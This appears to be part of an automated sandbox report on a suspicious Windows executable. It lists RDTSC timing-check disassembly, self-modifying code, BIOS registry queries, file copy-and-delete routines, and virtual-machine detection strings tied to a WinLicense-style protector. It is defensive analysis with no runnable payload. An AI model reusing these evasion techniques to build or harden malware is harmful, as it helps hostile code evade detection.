                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81872 second address: D81880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 je 00007F0D34B708F6h 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819AD second address: D819B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819B1 second address: D819B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819B5 second address: D819BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819BB second address: D819C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D819C1 second address: D81A0D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4AC8h 0x00000008 push edi 0x00000009 jmp 00007F0D344F4ABCh 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0D344F4AF8h 0x00000017 pushad 0x00000018 jmp 00007F0D344F4AC2h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81A0D second address: D81A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81A11 second address: D81A2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EEE3 second address: D2EEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81FF1 second address: D82005 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F0D344F4ABAh 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82005 second address: D82016 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D34B708FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82016 second address: D8201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8201C second address: D82022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8093F second address: D80964 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D344F4AC5h 0x0000000f jnl 00007F0D344F4AB6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46285 second address: D2E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d ja 00007F0D34B708F6h 0x00000013 jmp 00007F0D34B70903h 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b mov edx, dword ptr [ebp+122D197Ch] 0x00000021 call dword ptr [ebp+122D30CFh] 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007F0D34B70901h 0x0000002e jmp 00007F0D34B70903h 0x00000033 jmp 00007F0D34B708FCh 0x00000038 popad 0x00000039 pushad 0x0000003a jmp 00007F0D34B70903h 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46761 second address: D46767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46767 second address: D46771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0D34B708F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A2D second address: D46A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A34 second address: D46A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A41 second address: D46A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B7C second address: D46B86 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B86 second address: D46BBC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F0D344F4ABCh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F0D344F4ABBh 0x0000001b jng 00007F0D344F4ABCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D475F3 second address: D2EEE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dl, F4h 0x0000000c or dword ptr [ebp+122D2178h], eax 0x00000012 call dword ptr [ebp+1244A72Dh] 0x00000018 push edx 0x00000019 push eax 0x0000001a jg 00007F0D34B708F6h 0x00000020 pop eax 0x00000021 pop edx 0x00000022 jo 00007F0D34B70924h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0D34B708FAh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89D9A second address: D89DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F0D344F4AC9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89F07 second address: D89F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A045 second address: D8A04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A04B second address: D8A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A050 second address: D8A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A1B2 second address: D8A1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70905h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A480 second address: D8A484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A484 second address: D8A48E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D34B708F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A48E second address: D8A497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A497 second address: D8A4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4A0 second address: D8A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jo 00007F0D344F4B08h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4C9 second address: D8A4CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4CF second address: D8A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4AC2h 0x0000000d jmp 00007F0D344F4AC9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8EC12 second address: D8EC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8EC16 second address: D8EC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AD6 second address: D91ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91ADE second address: D91B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AC2h 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 pushad 0x00000011 jmp 00007F0D344F4AC9h 0x00000016 jmp 00007F0D344F4ABCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93CBC second address: D93CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C12 second address: D96C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C18 second address: D96C28 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B70902h 0x00000008 jne 00007F0D34B708F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C28 second address: D96C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C32 second address: D96C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AD22 second address: D9AD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AD27 second address: D9AD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F346 second address: D9F350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D344F4AB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F490 second address: D9F4AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 jmp 00007F0D34B708FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F0D34B708FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F5DB second address: D9F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F5E5 second address: D9F5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA01 second address: D9FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC0h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0D344F4AC1h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA33 second address: D9FA37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FE0 second address: D46FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FE4 second address: D46FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FEE second address: D46FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FF2 second address: D46FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FF6 second address: D47066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D3594h] 0x00000028 mov ebx, dword ptr [ebp+12478038h] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0D344F4AB8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D1800h], ebx 0x0000004e add eax, ebx 0x00000050 mov cx, dx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0D344F4ABAh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47066 second address: D47079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47079 second address: D47083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0D344F4AB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FBC3 second address: D9FBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FBC9 second address: D9FBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0D344F4AC0h 0x0000000f jl 00007F0D344F4AB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FDB4 second address: D9FDD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70906h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5972 second address: DA5978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5978 second address: DA597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA597E second address: DA5982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4D0F second address: DA4D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0D34B708F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E5B second address: DA4E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E61 second address: DA4E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E67 second address: DA4E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E6B second address: DA4E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E71 second address: DA4E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E80 second address: DA4ECD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0D34B70903h 0x00000011 jmp 00007F0D34B708FCh 0x00000016 jg 00007F0D34B708F6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0D34B70901h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5554 second address: DA555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC25E second address: DAC279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC521 second address: DAC527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC527 second address: DAC52D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC52D second address: DAC549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0D344F4AC4h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD62E second address: DAD637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADC03 second address: DADC19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4AC2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADC19 second address: DADC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BA1A9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DCCABE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_009538B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00954910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0094DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0094E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0094ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00954570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094F68A FindFirstFileA | 0_2_0094F68A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0094F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00953EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_009416D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0094DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0094BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00941160 GetSystemInfo,ExitProcess | 0_2_00941160
                Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2090680717.0000000001645000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
